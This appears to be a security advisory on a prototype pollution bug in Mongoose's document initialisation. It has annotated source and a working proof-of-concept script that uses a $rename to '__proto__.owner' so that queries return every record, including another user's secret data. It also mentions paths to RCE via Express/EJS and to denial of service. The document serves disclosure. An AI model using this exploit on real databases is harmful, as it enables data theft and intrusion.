// document.js /** * Init helper. * * @param {Object} self document instance * @param {Object} obj raw mongodb doc * @param {Object} doc object we are initializing * @param {Object} [opts] Optional Options * @param {Boolean} [opts.setters] Call `applySetters` instead of `cast` * @param {String} [prefix] Prefix to add to each path * @api private */ function init(self, obj, doc, opts, prefix) { // ... function _init(index) { // ... if (!schemaType && utils.isPOJO(obj[i])) { // ... // (1) // our malicious payload first reaches here, where: // obj is some document // i = '__proto__' // so, obj[i] gives Object.prototype, which gets used in (2) init(self, obj[i], doc[i], opts, path + '.'); } else if (!schemaType) { // (2) // after the recursive call on (1), we reach here // pollution happens on the next line, where: // doc: Object.prototype, // obj = { polluted: 'world!' }, // i = 'polluted' doc[i] = obj[i]; if (!strict && !prefix) { self[i] = obj[i]; } } else {

Credits

This bug was found by myself (@ehhthing) and @strellic_

Impact

If used with Express and EJS, this bug can easily lead to RCE. Many other libraries have known prototype pollution exploits as well, which may cause significant impact.

We also found that we can actually exploit Mongoose itself with the prototype pollution, to cause it to bypass all query parameters when using .find(), which allows an attacker to potentially dump entire collections:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

import { connect, model, Schema } from 'mongoose'; const mongoose = await connect('mongodb://127.0.0.1:27017/exploit'); const Post = model('Post', new Schema({ owner: String, message: String })); await Post.create({ owner: "SECRET_USER", message: "SECRET_MESSAGE" }); const post = await Post.create({ owner: "user", message: "test message" }); await Post.findByIdAndUpdate(post._id, { $rename: { message: '__proto__.owner' } }); // this pollutes Object.prototype.owner = "test message" await Post.find({ owner: "user" }); // now, when querying posts, even when an owner is specified, all posts are returned const posts = await Post.find({ owner: "user2" }); console.log(posts); // both posts created are found /* output: [ { _id: new ObjectId("64a7610756da3c04f900bf49"), owner: 'SECRET_USER', message: 'SECRET_MESSAGE', __v: 0 }, { _id: new ObjectId("64a7610756da3c04f900bf4b"), owner: 'user', __v: 0 } ] */ process.exit();

This could also easily lead to denial of service depending on how large a Mongo collection is, and which other libraries are being used in the application.